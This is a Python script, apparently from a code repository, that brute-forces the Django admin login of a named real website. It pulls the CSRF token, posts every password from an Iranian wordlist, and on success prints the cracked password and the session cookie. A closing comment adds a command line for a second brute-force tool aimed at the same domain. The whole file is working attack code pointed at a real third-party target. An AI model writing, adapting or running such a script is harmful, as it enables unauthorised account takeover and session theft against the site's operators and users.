hossein-por-shop/brute_force.py

import requests

from lxml import html

TARGET_URL = 'https://api.torob.com/torob-admin/login/'
USERNAME = ''
WORDLIST = '/root/Iranian-Password-list/nam2elist.txt'


def brute_force():
    print(f'Target: {TARGET_URL}')
    print(f'Trying passwords for {USERNAME}.')

    client = requests.session()
    page = client.get(TARGET_URL)

    tree = html.fromstring(page.content)
    csrf_middleware_token = tree.xpath('//input[@name="csrfmiddlewaretoken"]/@value')[0]


    csrf_token = client.cookies.get('csrftoken')
    cookies = {'csrftoken': csrf_token}


    headers = {'Referer': TARGET_URL}

    print('Reading file...')
    with open(WORDLIST, mode='r') as file:
        content = file.readlines()


    passwords = [p.strip() for p in content]

    print('Cracking', end='', flush=True)
    count = 0
    for password in passwords:
        count += 1
        print_count(count)
        body = {
            'username': USERNAME,
            'password': password,
            'csrfmiddlewaretoken': csrf_middleware_token
        }
        response = requests.post(
            TARGET_URL,
            cookies=cookies,
            headers=headers,
            data=body,
            allow_redirects=False
        )

        if response.status_code == 302:
            break

        if response.status_code == 200:
            continue

        break

    if response.status_code == 302:
        session_token = response.cookies.get('sessionid')
        print(f'\nSuccess. {count} passwords tried. Password: {password}. Session token: {session_token}.')
    elif response.status_code == 200:
        print(f'\nFailed. {count} passwords tried.')
    else:
        print(f'\nUnable to attempt login: received status code {response.status_code}.')


def print_count(counter, small_denom=10, big_denom=100):
    if (counter / small_denom).is_integer():
        print('.', end='', flush=True)
    if (counter / big_denom).is_integer():
        print(counter, end='', flush=True)


if __name__ == '__main__':
    brute_force()

#DjangoUnchained.py  -domain api.torob.com -scheme https -uri /torob-admin/login/ -userdict /root/DjangoUnchained/username.txt -passwdict /root/DjangoUnchained/password.txt -l  /root/file.log